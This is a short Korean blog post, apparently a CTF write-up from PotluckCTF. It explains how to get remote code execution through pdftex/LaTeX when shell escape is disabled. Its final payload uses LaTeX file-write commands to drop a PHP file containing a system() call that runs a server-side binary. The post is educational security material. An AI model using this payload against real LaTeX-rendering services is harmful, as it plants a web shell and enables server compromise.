<OOO>

pdftex(latex) 에서 RCE 하기 본문

CTF write up

pdftex(latex) 에서 RCE 하기

<OOO> 2023. 12. 30. 21:13

CTF 풀다가 못 푼 문제가 있었는데, 복기할 겸 쓴다. (지금은 문제가 닫혀있어 글로 작성한다.)

 

CTF : https://play.potluckctf.com/

 

 

먼저 걸려있는 조건은 하단과 같다.

 

1. -no-shell-escape 옵션 적용

2. php 사용

 

no-shell-escape 의 옵션은 write18을 사용하지 못하도록 설정하는 옵션이다.

* write18 이란? 서버에 명령어를 직접 전달할 수 있는 함수

 

RCE 하는 방법은 하단과 같다.

 

1. 파일을 생성

2. 파일 생성 시 내용에 php 코드 삽입

 

최종 페이로드

\newwrite\tempfile
\immediate\openout\tempfile=asdf.php
\immediate\write\tempfile{<?php system("/app/readflag");}
\immediate\closeout\tempfile

 

'CTF write up' 카테고리의 다른 글

Urmia CTF 2023 web writeup  (0) 2023.09.04
LINEctf 2023 web 풀이  (0) 2023.03.28
2023 Incognito 4.0 CTF Writeup  (2) 2023.02.18
MCH2022 web writeup  (2) 2022.07.27
2021 Christmas CTF WEB writeup  (0) 2021.12.30
Comments